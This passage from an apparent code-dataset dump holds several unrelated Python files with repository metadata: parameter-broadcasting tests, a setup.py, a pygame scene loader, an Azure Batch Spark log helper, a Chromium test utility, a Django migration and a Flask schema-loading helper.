assert len(t.param_sets) == 2
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert np.all(t.param_sets[0] == [[10], [20]])
assert np.all(t.param_sets[1] == [[1, 2], [3, 4]])
assert np.all(t.parameters == [10, 20, 1, 2, 3, 4])
assert t.coeff.shape == (2,)
assert t.e.shape == (2, 2)
def test_two_model_1d_array_parameters(self):
t = TParModel([[10, 20], [30, 40]], [[1, 2], [3, 4]], n_models=2)
assert len(t) == 2
assert t.model_set_axis == 0
assert np.all(t.param_sets == [[[10, 20], [30, 40]],
[[1, 2], [3, 4]]])
assert np.all(t.parameters == [10, 20, 30, 40, 1, 2, 3, 4])
assert t.coeff.shape == (2, 2)
assert t.e.shape == (2, 2)
t2 = TParModel([[10, 20, 30], [40, 50, 60]],
[[1, 2, 3], [4, 5, 6]], n_models=2)
assert len(t2) == 2
assert t2.model_set_axis == 0
assert np.all(t2.param_sets == [[[10, 20, 30], [40, 50, 60]],
[[1, 2, 3], [4, 5, 6]]])
assert np.all(t2.parameters == [10, 20, 30, 40, 50, 60,
1, 2, 3, 4, 5, 6])
assert t2.coeff.shape == (2, 3)
assert t2.e.shape == (2, 3)
def test_two_model_mixed_dimension_array_parameters(self):
with pytest.raises(InputParameterError):
# Can't broadcast different array shapes
TParModel([[[1, 2], [3, 4]], [[5, 6], [7, 8]]],
[[9, 10, 11], [12, 13, 14]], n_models=2)
t = TParModel([[[10, 20], [30, 40]], [[50, 60], [70, 80]]],
[[1, 2], [3, 4]], n_models=2)
assert len(t) == 2
assert t.model_set_axis == 0
assert len(t.param_sets) == 2
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert np.all(t.param_sets[0] == [[[10, 20], [30, 40]],
[[50, 60], [70, 80]]])
assert np.all(t.param_sets[1] == [[[1, 2]], [[3, 4]]])
assert np.all(t.parameters == [10, 20, 30, 40, 50, 60, 70, 80,
1, 2, 3, 4])
assert t.coeff.shape == (2, 2, 2)
assert t.e.shape == (2, 2)
def test_two_model_2d_array_parameters(self):
t = TParModel([[[10, 20], [30, 40]], [[50, 60], [70, 80]]],
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], n_models=2)
assert len(t) == 2
assert t.model_set_axis == 0
assert np.all(t.param_sets == [[[[10, 20], [30, 40]],
[[50, 60], [70, 80]]],
[[[1, 2], [3, 4]],
[[5, 6], [7, 8]]]])
assert np.all(t.parameters == [10, 20, 30, 40, 50, 60, 70, 80,
1, 2, 3, 4, 5, 6, 7, 8])
assert t.coeff.shape == (2, 2, 2)
assert t.e.shape == (2, 2, 2)
def test_two_model_nonzero_model_set_axis(self):
# An example where the model set axis is the *last* axis of the
# parameter arrays
coeff = np.array([[[10, 20, 30], [30, 40, 50]], [[50, 60, 70], [70, 80, 90]]])
coeff = np.rollaxis(coeff, 0, 3)
e = np.array([[1, 2, 3], [3, 4, 5]])
e = np.rollaxis(e, 0, 2)
t = TParModel(coeff, e, n_models=2, model_set_axis=-1)
assert len(t) == 2
assert t.model_set_axis == -1
assert len(t.param_sets) == 2
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert np.all(t.param_sets[0] == [[[10, 50], [20, 60], [30, 70]],
[[30, 70], [40, 80], [50, 90]]])
assert np.all(t.param_sets[1] == [[[1, 3], [2, 4], [3, 5]]])
assert np.all(t.parameters == [10, 50, 20, 60, 30, 70, 30, 70, 40, 80,
50, 90, 1, 3, 2, 4, 3, 5])
assert t.coeff.shape == (2, 3, 2) # note change in api
assert t.e.shape == (3, 2) # note change in api
def test_wrong_number_of_params(self):
with pytest.raises(InputParameterError):
TParModel(coeff=[[1, 2], [3, 4]], e=(2, 3, 4), n_models=2)
with pytest.raises(InputParameterError):
TParModel(coeff=[[1, 2], [3, 4]], e=(2, 3, 4), model_set_axis=0)
def test_wrong_number_of_params2(self):
with pytest.raises(InputParameterError):
m = TParModel(coeff=[[1, 2], [3, 4]], e=4, n_models=2)
with pytest.raises(InputParameterError):
m = TParModel(coeff=[[1, 2], [3, 4]], e=4, model_set_axis=0)
def test_array_parameter1(self):
with pytest.raises(InputParameterError):
t = TParModel(np.array([[1, 2], [3, 4]]), 1, model_set_axis=0)
def test_array_parameter2(self):
with pytest.raises(InputParameterError):
m = TParModel(np.array([[1, 2], [3, 4]]), (1, 1, 11),
model_set_axis=0)
def test_array_parameter4(self):
"""
Test multiple parameter model with array-valued parameters of the same
size as the number of parameter sets.
"""
t4 = TParModel([[1, 2], [3, 4]], [5, 6], model_set_axis=False)
assert len(t4) == 1
assert t4.coeff.shape == (2, 2)
assert t4.e.shape == (2,)
assert np.issubdtype(t4.param_sets.dtype, np.object_)
assert np.all(t4.param_sets[0] == [[1, 2], [3, 4]])
assert np.all(t4.param_sets[1] == [5, 6])
def test_non_broadcasting_parameters():
"""
Tests that in a model with 3 parameters that do not all mutually broadcast,
this is determined correctly regardless of what order the parameters are
in.
"""
a = 3
b = np.array([[1, 2, 3], [4, 5, 6]])
c = np.array([[1, 2, 3, 4], [1, 2, 3, 4]])
class TestModel(Model):
p1 = Parameter()
p2 = Parameter()
p3 = Parameter()
def evaluate(self, *args):
return
# a broadcasts with both b and c, but b does not broadcast with c
for args in itertools.permutations((a, b, c)):
with pytest.raises(InputParameterError):
TestModel(*args)
def test_setter():
pars = np.random.rand(20).reshape((10, 2))
model = SetterModel(xc=-1, yc=3, p=np.pi)
for x, y in pars:
np.testing.assert_almost_equal(
model(x, y),
(x + 1)**2 + (y - np.pi * 3)**2)
| 34.004637
| 86
| 0.534703
|
26c2ef38f291c70bc50935053ca012609ea81e03
| 748
|
py
|
Python
|
setup.py
|
davidkirwan/duffy
|
c15e5897ce643799c5baae2b29f77db2c96e59ad
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
davidkirwan/duffy
|
c15e5897ce643799c5baae2b29f77db2c96e59ad
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
davidkirwan/duffy
|
c15e5897ce643799c5baae2b29f77db2c96e59ad
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import setuptools
setuptools.setup(
name='duffy',
description='',
version='2.0.2',
packages=setuptools.find_packages(),
include_package_data=True,
license='Apache 2.0',
install_requires=[
'beanstalkc',
'flask',
'flask-marshmallow',
'flask-migrate',
'flask-sqlalchemy',
'marshmallow-sqlalchemy',
'marshmallow==3.0.0b6',
'pymysql',
'paramiko',
],
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Utilities",
],
scripts=[],
)
| 22
| 61
| 0.550802
|
2b25d6c6a75c1b4e1c3f8966eece8260ed764f29
| 3,300
|
py
|
Python
|
04.adventure/17.ui_panel_reactif/scene.py
|
Gaetz/python-training
|
542f658883c66aaa932fb9e385225cfd573bb6de
|
[
"MIT"
] | 1
|
2021-10-05T11:45:28.000Z
|
2021-10-05T11:45:28.000Z
|
04.adventure/17.ui_panel_reactif/scene.py
|
Gaetz/python-training
|
542f658883c66aaa932fb9e385225cfd573bb6de
|
[
"MIT"
] | null | null | null |
04.adventure/17.ui_panel_reactif/scene.py
|
Gaetz/python-training
|
542f658883c66aaa932fb9e385225cfd573bb6de
|
[
"MIT"
] | null | null | null |
import pygame
from sprite_controlled import SpriteControlled
from sprite import Sprite
from warp import Warp
from ui_panel import UiPanel
class Scene:
path = 'D:\\Code\\ArtFx\\Python\\python-training\\01.adventure\\17.ui_panel_reactif\\'
def __init__(self, filename):
self.filename = filename
self.load(filename)
def load(self, filename):
file = open(Scene.path + filename)
data = file.read().splitlines()
ground_height = 0
self.cursor = Sprite(0, 0, 'cursor.png', False)
self.sprites = []
self.warps = []
self.panel = UiPanel(0, 0, 800, 100)
for line in data:
cell = line.split(";")
# Ground
if(cell[0] == "ground"):
self.ground = Sprite(0, 0, cell[1]+".png", False)
_, screen_h = pygame.display.get_surface().get_size()
ground_height = screen_h - self.ground.surface.get_height()
self.ground.y = ground_height
# Background
elif(cell[0] == "background"):
self.background = Sprite(0, 0, cell[1]+".png", False)
# Player
elif(cell[0] == "player"):
height = 0
if cell[3] == "ground":
height = -1
self.player = SpriteControlled(int(cell[2]), height, cell[1]+".png", True, int(cell[4]))
# Sprites
elif(cell[0] == "sprite"):
height = 0
if cell[3] == "ground":
height = -1
sprite = Sprite(int(cell[2]), height, cell[1]+".png", True)
self.sprites.append(sprite)
# Warps
elif(cell[0] == "warp"):
height = 0
if cell[3] == "ground":
height = -1
warp = Warp(int(cell[2]), height, cell[1]+".png", False, eval(cell[4]))
self.warps.append(warp)
# Set heights
if(self.player.y == -1):
self.player.y = ground_height
for s in self.sprites:
if(s.y == -1):
s.y = ground_height
for w in self.warps:
if(w.y == -1):
w.y = ground_height - w.surface.get_height() / 2
def inputs(self, events):
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
mouse_click = pygame.mouse.get_pos()
self.player.move_to(mouse_click[0])
if event.type == pygame.KEYDOWN:
keys = pygame.key.get_pressed()
if keys[pygame.K_F5]:
self.load(self.filename)
def update(self, change_scene):
self.cursor.set_position(pygame.mouse.get_pos())
self.player.update()
for w in self.warps:
if(self.player.intersects(w)):
change_scene(w.to_scene, w.to_scene_x)
self.panel.update()
def draw(self, screen):
self.background.draw(screen)
self.ground.draw(screen)
for w in self.warps:
w.draw(screen)
for s in self.sprites:
s.draw(screen)
self.player.draw(screen)
self.panel.draw(screen)
self.cursor.draw(screen)
| 33.333333
| 104
| 0.507576
|
a6f7b895afa00a413b36794dccc08a03cc8328c5
| 2,009
|
py
|
Python
|
aztk/spark/client/job/helpers/get_application_log.py
|
atg-abhishek/aztk
|
e3d060e58373c316fddbc0907f08b1430e1b2691
|
[
"MIT"
] | null | null | null |
aztk/spark/client/job/helpers/get_application_log.py
|
atg-abhishek/aztk
|
e3d060e58373c316fddbc0907f08b1430e1b2691
|
[
"MIT"
] | null | null | null |
aztk/spark/client/job/helpers/get_application_log.py
|
atg-abhishek/aztk
|
e3d060e58373c316fddbc0907f08b1430e1b2691
|
[
"MIT"
] | null | null | null |
import azure.batch.models as batch_models
import azure.batch.models.batch_error as batch_error
from aztk import error
from aztk.spark import models
from aztk.utils import helpers
from .get_recent_job import get_recent_job
def _get_application_log(core_job_operations, spark_job_operations, job_id, application_name):
# TODO: change where the logs are uploaded so they aren't overwritten on scheduled runs
# current: job_id, application_name/output.log
# new: job_id, recent_run_job.id/application_name/output.log
recent_run_job = get_recent_job(core_job_operations, job_id)
try:
task = core_job_operations.batch_client.task.get(job_id=recent_run_job.id, task_id=application_name)
except batch_models.batch_error.BatchErrorException as e:
# see if the application is written to metadata of pool
applications = spark_job_operations.list_applications(job_id)
for application in applications:
if applications[application] is None and application == application_name:
raise error.AztkError("The application {0} has not yet been created.".format(application))
raise error.AztkError("The application {0} does not exist".format(application_name))
else:
if task.state in (
batch_models.TaskState.active,
batch_models.TaskState.running,
batch_models.TaskState.preparing,
):
raise error.AztkError("The application {0} has not yet finished executing.".format(application_name))
return core_job_operations.get_application_log(job_id, application_name)
def get_job_application_log(core_job_operations, spark_job_operations, job_id, application_name):
try:
return models.ApplicationLog(
_get_application_log(core_job_operations, spark_job_operations, job_id, application_name))
except batch_error.BatchErrorException as e:
raise error.AztkError(helpers.format_batch_exception(e))
| 46.72093
| 113
| 0.740667
|
65fe6abc5430330438a2a7f3c6edd5953879ed8c
| 46
|
py
|
Python
|
refactorings/__init__.py
|
Amin-MAG/CodART
|
a964a506d031f6eea505df081b9ba946f490d021
|
[
"MIT"
] | 18
|
2020-11-26T08:31:27.000Z
|
2022-03-28T07:35:41.000Z
|
refactorings/__init__.py
|
Amin-MAG/CodART
|
a964a506d031f6eea505df081b9ba946f490d021
|
[
"MIT"
] | 82
|
2020-12-25T08:26:27.000Z
|
2022-03-25T06:11:36.000Z
|
refactorings/__init__.py
|
Amin-MAG/CodART
|
a964a506d031f6eea505df081b9ba946f490d021
|
[
"MIT"
] | 59
|
2020-11-26T08:31:42.000Z
|
2022-02-04T11:09:03.000Z
|
# from refactorings import collapse_hierarchy
| 23
| 45
| 0.869565
|
1cb89ad30caffc8b395fbf467e19582cbf2bd775
| 644
|
py
|
Python
|
testing/scripts/rust/exe_util_unittests.py
|
chromium/chromium
|
df46e572c3449a4b108d6e02fbe4f6d24cf98381
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
testing/scripts/rust/exe_util_unittests.py
|
chromium/chromium
|
df46e572c3449a4b108d6e02fbe4f6d24cf98381
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 86
|
2015-10-21T13:02:42.000Z
|
2022-03-14T07:50:50.000Z
|
testing/scripts/rust/exe_util_unittests.py
|
chromium/chromium
|
df46e572c3449a4b108d6e02fbe4f6d24cf98381
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
#!/usr/bin/env vpython3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
import os
from pyfakefs import fake_filesystem_unittest
import sys
import tempfile
import unittest
import exe_util
class ExeUtilTests(fake_filesystem_unittest.TestCase):
def test_run_and_tee_output(self):
# Test wrapping Python as it echos a '.' character back.
args = [sys.executable, '-c', 'print(\'.\')']
output = exe_util.run_and_tee_output(args)
self.assertEqual('.', output.strip())
| 26.833333
| 72
| 0.732919
|
21b1fb6c015ae3edebc36006c0e1067abd2a9a14
| 575
|
py
|
Python
|
core/migrations/0017_auto_20210119_1217.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 2
|
2020-12-17T13:50:42.000Z
|
2021-01-09T07:01:07.000Z
|
core/migrations/0017_auto_20210119_1217.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 2
|
2021-08-25T05:02:56.000Z
|
2022-01-16T18:29:49.000Z
|
core/migrations/0017_auto_20210119_1217.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 1
|
2020-11-16T01:40:15.000Z
|
2020-11-16T01:40:15.000Z
|
# Generated by Django 3.1.5 on 2021-01-19 12:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0016_auto_20210119_0848'),
]
operations = [
migrations.AlterField(
model_name='product',
name='name_lt',
field=models.CharField(max_length=128, unique=True),
),
migrations.AlterField(
model_name='product',
name='name_search_lt',
field=models.CharField(max_length=128, unique=True),
),
]
| 23.958333
| 64
| 0.589565
|
54a9b93ba1e6ab4f62d6ef94b5e504c220eda5d7
| 622
|
py
|
Python
|
services/python-images/src/master/helpers/io.py
|
hpi-epic/mpcsl
|
05361acb0c8da68ddfa21f9fc9cd32a59255dc5c
|
[
"MIT"
] | 1
|
2021-11-21T13:52:36.000Z
|
2021-11-21T13:52:36.000Z
|
services/python-images/src/master/helpers/io.py
|
hpi-epic/mpcsl
|
05361acb0c8da68ddfa21f9fc9cd32a59255dc5c
|
[
"MIT"
] | 3
|
2021-10-06T13:23:43.000Z
|
2022-01-07T13:48:41.000Z
|
services/python-images/src/master/helpers/io.py
|
hpi-epic/mpcsl
|
05361acb0c8da68ddfa21f9fc9cd32a59255dc5c
|
[
"MIT"
] | null | null | null |
from flask import request
from werkzeug.exceptions import BadRequest
class InvalidInputData(BadRequest):
def __init__(self, message='Invalid input data.', payload=None):
self.payload = payload
BadRequest.__init__(self, description=payload or message)
def load_data(schema, location='json', *args, **kwargs):
vals = getattr(request, location, None)
data, errors = schema().load(vals, *args, **kwargs)
if len(errors) > 0:
raise InvalidInputData(payload=errors)
return data
def marshal(schema, object, *args, **kwargs):
return schema().dump(object, *args, **kwargs).data
| 29.619048
| 68
| 0.699357
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.